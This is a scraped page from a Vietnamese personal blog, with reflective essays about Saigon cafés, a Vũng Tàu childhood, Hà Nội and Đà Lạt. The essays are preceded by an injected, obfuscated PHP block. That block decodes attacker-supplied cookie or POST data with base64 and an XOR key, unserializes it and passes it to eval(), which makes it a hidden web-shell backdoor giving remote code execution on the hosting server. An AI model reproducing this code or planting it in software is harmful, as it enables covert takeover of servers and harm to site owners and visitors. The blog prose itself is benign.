$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Việt Nam – Page 3 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Việt Nam (page 3 of 3)

Sài Gòn của anh – Cafe bệt

Cafe bệt

Bạn anh ở Hà Nội vào đây nói, anh xin lỗi, anh lập lại nguyên văn, chứ anh thì không bao giờ chửi thề: đm, cái xứ đe’o gì mà toàn quán cafe là quán cafe.

Cô giáo lớp 1 của anh từng dạy rằng, hễ ai chửi thề thì người đó là người xấu.
Cô giáo lớp 2 của anh lại bảo, nên chọn người thật thà mà chơi.
Thế thì anh biết làm sao, phỏng ạ! Bởi câu nói trên của bạn anh là hoàn toàn đúng.

Cám ơn trời, anh không phải dân Nhân Văn, vì thế anh cực dốt viết những gì đi sâu, tận sâu vào văn hoá, phong tục, tập quán. Nhưng anh có cái miệng, vì vậy, anh nghĩ rằng anh có quyền gọi: Văn hoá cafe Sài Gòn.

Sài Gòn chi chít quán cafe, đủ mọi thể loại và phong cách. Có quán đánh vào sự trẻ trung, nhịp sống hiện đại, có quán tìm về không gian trầm mặc, cổ xưa. Có nơi mở jazz, nơi Tuấn Ngọc, nơi gào thét tiếng nhạc Rock chát chúa. Mỗi quán, à không, mỗi thể loại quán, đều góp phần tạo nên cái gọi là Văn hoá cafe Sài Gòn (mà anh đã nhắc ở trên). Tuy nhiên, cafe đặc biệt nhất, theo anh chính là cafe bệt.

Thực ra, không ai biết tên chính xác của cafe bệt là gì, bởi vì nó làm khỉ gì có tên. Chỉ là mỗi người một cách gọi, và bọn anh quen gọi nó như thế.
Cafe bệt nằm ở ngay công viên gì đấy trước Dinh Độc Lập, được chia theo vị trí thành bốn góc (mà có bạn gọi là 4 vùng chiến khu). Trong đó, góc anh hay ngồi nhất là góc đối diện ngay Nhà Thờ Đức Bà.

Nói về ý nghĩa cuộc sống này nọ thì nghe có vẻ triết lí quá – nếu nói theo nghĩa lịch sự, còn nói theo ngôn ngữ bình thường là: xạo bỏ mẹ. Nhưng đúng là, một buổi sáng, à, Sài Gòn này vẫn có khái niệm sáng sớm, nhưng không rõ ràng lắm. Có lẽ, khái niệm buổi sáng sớm của Sài Gòn nên là 7h sáng thì đúng hơn. Nhắc lại, tầm 7h sáng ngồi ở cafe bệt, nhâm nhi li cafe và ổ bánh mì (anh thề, chẳng ngon lành gì sất, nhưng ăn thích thích), và ngắm dòng người – xe chạy thoăn thoắt đủ mọi ngả, lâu lâu chau mày vì những tia nắng sớm mai xuyên qua kẽ lá, nhảy đùa nghịch trên khuôn mặt, cảm giác ấm áp nơi mái tóc chưa gội mấy ngày. Lúc đấy, nhìn lên bầu trời tươi tắn, không một gợn mây, phóng tầm mắt ra xa xíu nữa, bắt gặp vẻ cổ kích như mãi trường tồn với thời gian của nhà thờ Đức Bà, xen với vẻ hiện đại của toà nhà cao tầng Diamond Plaza với lớp kiếng phản chiếu hàng cây xanh – xanh ngắt, khẽ lẩm bẩm câu hát màu nắng hay là màu mắt em. Với anh, đấy đích thực là cảm giác an bình.

Những ngày anh chia tay với bạn gái, anh thực hiện lối sống khốn nạn một cách triệt để: tối ngủ sớm, sáng dậy đi bơi. Đi bơi xong, anh và thằng bạn hay phóng một mạch lên cafe bệt, chỉ đơn thuần là ngồi đó đọc báo giấy và ngắm cảnh, ngắm người. Không lâu đâu, chỉ cần 30′ thôi, rồi cũng lại nhập vào cái dòng xoay hối hả ấy. Nhưng như thế đã là quá hoàn hảo để bắt đầu một ngày mới…

Cảm giác an bình mà hiếm hoi anh tìm được ở Sài Gòn của anh chính là nơi Cafe bệt.

B.l.u.e

p/s: ảnh của kylin nguồn từ Diễn đàn tin học.

Sài Gòn của anh

Sài Gòn xưa

Anh thích cái tên Sài Gòn hơn Thành phố Hồ Chí Minh.

Thật ra chẳng liên quan gì đến lí do chính trị này nọ. Đơn giản là vì từ hồi nhỏ, tầm mỗi tháng một lần, cứ buổi tối, lại có một thằng bé rất đáng yêu, với đôi mắt đen to tròn lay láy (là anh đới), đứng tựa cửa chờ mẹ “đi Sài Gòn” về. Khi đấy, đối với những đứa trẻ nhà quê như anh, thì “đi Sài Gòn” là một việc gì lớn lao lắm. Nó khác hẳn so với việc bọn anh hằng ngày vừa đi vừa chạy nhảy, cười nói líu lo trên con đường làng. Chính vì thế, hai chữ “Sài Gòn” nó có gì đó rất đặc biệt trong anh. Nó có thể là một phần niềm mơ ước thời còn niên thiếu, hoặc giả là những gì hiếm hoi còn sót lại mà anh có thể nhớ, để lâu lâu nhấp miếng trà và tặc lưỡi nói rằng: “Ngày đấy, anh thường hay nghĩ tới…”

Những người dân nơi đây cũng có rất nhiều người thích hai tiếng Sài Gòn. Đó đa phần là những người mà kí ức đẹp nhất gắn với vùng đất được mệnh danh “hòn ngọc Viễn Đông” trước năm 1975. So với lí do của họ, thì có vẻ anh hơi buồn cười nhỉ. Đúng kiểu em chã, uỷ mị, thơ với chả ấu, thằng vẽ chuyện, anh biết sẽ có đứa ác mồm ác miệng bảo thế. Nhưng kệ, anh cứ thích.

Anh chưa từng tự hỏi chính anh: Cái tình cảm thực sự của anh đối với Sài Gòn là gì? Chỉ đơn giản là một vùng đất nơi anh ở, hay nó là một phần trong anh?

Sài Gòn chẳng là của riêng ai. Nhưng khi anh đặt tiêu đề Sài Gòn của anh, ấy là anh đang muốn đề cập tới những cảm xúc về Sài Gòn qua cái nhìn của anh. Đó có thể là một góc nhìn đầy sần sùi, gai góc, sặc mùi tiêu cực; đó cũng có thể là một cái nhìn thật nhẹ, thật mông lung và huyền ảo. Đó có thể là cái nhìn được nhuộm một màu xám nhàn nhạt của quá khứ; hoặc giả là những màu sắc rõ nét nhất mà dòng thời gian – đang – tuôn – chảy dệt nên nó… Chỉ có một điều chắc chắn, anh nhắc lại, đó sẽ là cái nhìn của riêng anh..

Vũng Tàu

Vũng Tàu

Có những khoảng thời gian bằng nhau nhưng ý nghĩa lại khác nhau. Anh biết anh rồi sẽ lần lượt phải trải qua lần lượt từng khoảng mười hai năm xoay vần, nhưng có lẽ, sẽ không có mười hai năm nào, đẹp như mười hai năm đầu ấy.

Mười hai năm, chỉ ba chữ ngắn gọn, nhưng đó là tuổi thơ của anh.
Mười hai năm, là vô vàn kí ức, kỉ niệm, có cái đã mãi mãi nằm lại với thời gian, có cái vẫn theo anh cho đến tận giờ.

Vũng Tàu trong kí ức của anh không dính dáng gì đến biển. Thật ngạc nhiên, nhưng quả thật là thế. Dù trong giấy khai sinh, hộ khẩu, chỗ thành phố của anh vẫn ghi hai chữ Vũng Tàu, nhưng chỉ là thuộc tỉnh Vũng Tàu. Từ nơi anh ở tới biển, chim chắc cũng phải thay chục đôi cánh mới tới.

Nhưng chẳng hề gì, anh yêu Vũng-Tàu-không-biển-của-anh, hơn là cái Vũng Tàu với những bãi biển đẹp, những con đường lồng lộng gió ban chiều mà các bạn ưa thích.

Vũng Tàu của anh là những con đường đất

Đường đất

màu nâu nhạt. Ở ngoài cùng hai bên bờ là bờ cỏ xanh mướt. Và nằm chính giữa cái khoảng đường đất và bờ cỏ là các mương để dẫn nước.

Anh còn nhớ, khi anh nhỏ, trò chơi ưa thích của anh khi trời mưa là lội xuống những cái mương nhỏ ấy để bắt cá. Đôi khi bắt xong rồi lại thả nó xuống, rồi hì hục bắt tiếp, cứ thế mà hò hét cả buổi chiều.

Vũng Tàu của anh là những hàng rào hoa râm bụt, mà thương thay, đến bây giờ khi về lại, anh mới nhận ra là chúng thấp bé đến nhỏ nhoi, hay cũng có thể tại vì anh không còn là thằng nhóc lùn tịt của ngày ấu thơ.

Anh còn nhớ, khi anh nhỏ, anh cực kì ưa thích trò chui hàng rào. Các bạn cứ thử đi, anh quả quyết, cảm giác chui hàng rào nó hấp dẫn và nó vĩ đại hơn nhiều so với việc tung chân đá bay cánh cổng chính rồi đường hoàng bước vào.

Vũng Tàu của anh là bọn trẻ hàng xóm cùng những trò nghịch ngợm vui đùa.
Vũng Tàu của anh là những cây điều trước nhà, nơi trưa nào anh cũng leo lên đó nằm khềnh ra ngắm trời trăng [hồi đấy anh chưa biết buổi trưa không có trăng], mơ ước những điều viển vông, lâu lâu với tay ngắt trái điều và cẩn thận đưa vào miệng, kẻo nước điều dây vào áo không giặt ra thì lại bị la mắng.
Vũng Tàu của anh là chuồng lợn ba mẹ nuôi, mà mới bốn tuổi, vì nghịch không quản được, anh được ưu ái nhốt vào đó; là luống rau muống ba mẹ trồng sau nhà; là cái ao mà mỗi mùa mưa tiếng ếch kêu ộp oạp náo động cả đêm hè.

Vũng Tàu của anh, là mái trường, là nhà dòng, nơi mà tuy cơ sở vật chất đầy thiếu thốn, nhưng nếu không có mái trường tiểu học và nhà dòng, thì nhất định sẽ không có một anh tài hoa phong nhã như ngày nay. Đến bây giờ, và cho tới tận mai sau, anh sẽ không bao giờ quên được hình ảnh những người thầy của thời thơ ấu ấy, những người mà luôn nói với anh rằng anh rất đặc biệt, luôn truyền cho anh sự tự tin rằng mình không hề thua kém ai.

Gần mười hai năm nữa đã trôi qua, ở cái nơi thân thương ấy, đã có rất nhiều kí ức anh buộc phải bỏ lại [anh rất buồn, nhưng phải đổ lỗi rằng trí nhớ con người có hạn], nhưng cũng có rất nhiều, rất rất nhiều thứ mãi đi cùng anh, thậm chí, trở thành một phần con người anh.

Tạm biệt vùng đất thân yêu, hi vọng rằng, anh sẽ không phải tốn thêm một khoảng xoay vần là mười hai năm, mới có thể gặp lại bạn.

Tạm biệt kí ức một thời…

B.l.u.e.

Hà Nội

Hà Nội – Cựu mộng như yên…

Không chỉ là mơ, mà còn là một giấc mơ tưởng chừng không có thật.

Hà Nội, bản thân nó trong anh là mờ ảo. Chỉ là cái cảm giác rùng mình khi đọc

Hàng liễu lơ thơ đứng chịu tang

của Xuân Diệu, hay chặc lưỡi tấm tắc

Sáng chớm lạnh trong lòng Hà Nội
Những phố dài xao xác heo may

dưới ngòi bút của Nguyễn Đình Thi vào những năm ngồi dưới mái trường phổ thông trung học. Hoặc giả, đấy là cảm giác thanh tao, nhẹ nhàng khi ngồi bên li cafe đậm đặc mà thả hồn vào từng nốt nhạc của Em ơi Hà Nội phố. Đấy, hầu hết, chỉ là chút gì đó ngưỡng vọng, xen lẫn ghen tị. Chỉ thế, không hơn, như hai kẻ xa lạ đi lướt qua nhau, những gì đọng lại chỉ là chút hương thầm bay trong làn gió.

Hà Nội, cùng mối liên hệ mật thiết giữa nó và nàng, trái lại, đã và đang in hằn những vết rất sâu lên lớp vỏ não của anh.

Đã hơn một năm trôi qua, nhưng anh vẫn nhớ, nhớ tới điên cuồng – ừ, tại Merry và Vodka làm anh thế – quãng thời gian anh tận tay chạm được vào nó.

Đôi lúc, như những lúc này, anh lại ngồi và tự hỏi: phải chăng những cảm giác ấy chỉ là cơn mơ hay đấy là sự thật, mà nay đã được nhuộm một màu khói hư ảo?

Anh nhớ Hà Nội
…không còn vì những vần thơ
…chẳng bởi những câu ca
…không vì mùa thu lá bay xào xạc
…hay mùa đông cùng hình ảnh thiếu nữ run run

Anh nhớ Hà Nội
…vì nó là niềm vui, là kí ức, nhưng cũng là những ngày buồn đong đầy

Hà Nội, trong anh, là Hà Nội của nàng – không – còn – là – của – anh

B.l.u.e.

Đà Lạt

Đà Lạt

Người xuống núi mang về đâu có chắc
Những dịp về còn nữa ở mai sau?
Dặm hồng vàng ai đứng lại nhìn nhau?
((Bùi Giáng – Giã Từ Đà Lạt))

Người ta cho rằng, thói quen nhìn lại quãng đời đã qua của mình thường chỉ có ở người già, những người mà thứ dệt nên cuộc sống của họ, không phải là các gam màu tươi sáng, rõ ràng của hiện tại, mà là một màu “xám” đến nhạt nhoà của quá khứ.

Nàng trong anh cũng là một màu xám, chỉ có điều nàng không nhạt nhoà. Thời gian đã và đang dệt một lớp bụi ngày càng dày hơn lên trên khuôn mặt nàng. Nhưng với anh, nàng không bị che khuất, mà vẫn sống động như ngày nào.

Anh đã từng gắng làm tất cả mọi thứ để quên nàng, từ những hành động đơn giản như tắt TV, hay đóng trình duyệt web mỗi khi tình cờ thấy xuất hiện tên nàng, cho đến những thứ phức tạp hơn như mượn câu châm ngôn “Esse est percipi” ((Tồn tại nghĩa là được nhận thức bằng tri giác)) của Berkeyley để tự ép mình quên.
Chỉ bởi vì nàng vẫn còn tồn tại trong anh.

Nàng rất đẹp. Mọi người ở đất nước này đều nói như thế. Nàng có vẻ dữ dội như những dòng thác ngàn năm chảy mãi, lại có vẻ trầm mặc như những rừng thông xanh bát ngát, hay vẻ mộng mơ phiêu ảo tựa mây trời đên đỉnh Lang Biang.
Ở bên nàng, ai cũng có cảm giác bình yên.

Nàng không phải là người anh yêu nhất, nhưng là người anh nhớ nhất.
Nàng mang lại cho anh cái hạnh phúc tột đỉnh, nhưng cũng chính nàng, thực ra là những kí ức về nàng, dìm anh vào nỗi đau mà đã có những lúc anh tưởng chừng không thoát được.

Chỉ bởi vì, nàng là nhân chứng, cho một cuộc tình – đẹp – nhưng – dang – dở, của anh…

Rồi lại sẽ có ngày, anh trở về thăm nàng, nhưng khi đấy, sẽ là một anh – đầy hạnh phúc.

B.l.u.e.

Em còn nhớ hay em đã quên?

Em còn nhớ hay em đã quên?

Ở Việt Nam này, có bốn thành phố để lại trong anh những cung bậc cảm xúc khác nhau.

Đó là Vũng Tàu – nơi anh sinh ra và lớn lên, những kí ức của một thời niên thiếu đầy hiếu động nhưng cũng thật đẹp, thật an bình của anh nằm ở đó. Những gì cốt lõi tạo nên một anh – như – bây – giờ cũng nằm nơi đó…
Đó là Sài Gòn – nơi hiện tại anh đang sống. Nó đi cùng cái tuổi trưởng thành của anh. Anh không diễn tả được cảm xúc của anh với nó, chỉ biết rằng nó thân quen như chính một phần máu thịt của anh…
Đó là Hà Nội – một người tình trong mộng ảo của anh. Hà Nội anh yêu là một Hà Thành với những nét đẹp như trong tranh vẽ, là một Hà Thành với vẻ run rẩy của hàng dương liễu mọc quanh hồ Trúc Bạch, một Hà – Nội – dáng – kiều – thơm ((Tây Tiến – Quang Dũng)), một Hà Nội – hàng phố cũ rêu phong, từng mái ngói xô nghiêng, nao nao kỷ niệm ((Em ơi Hà Nội phố – Phan Vũ)). Và giờ đây, quan trọng hơn hết, một Hà Nội – em…
Đó là Đà Lạt – nơi anh chỉ mới đặt chân đến hai lần. Mỗi lần chỉ ở lại tầm ba ngày. Lần đầu không ấn tượng bao nhiêu thì lần sau lại sâu đậm bấy nhiêu. Nó là chút gì còn ít ỏi mà anh bám víu lại, để nhớ về một thời hạnh phúc, thật sự rất hạnh phúc của anh. Đà Lạt, cùng những kỉ niệm về nó, tựa như một thứ ma tuý đầy quyến rũ, mộng ảo, khiến anh không thể nào dứt ra được. Nó quện cứng vào tâm trí anh, nó làm trí óc anh vui, nhưng lại khiến con tim anh đau…

Anh sẽ viết lần lượt về bốn thành phố này…
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.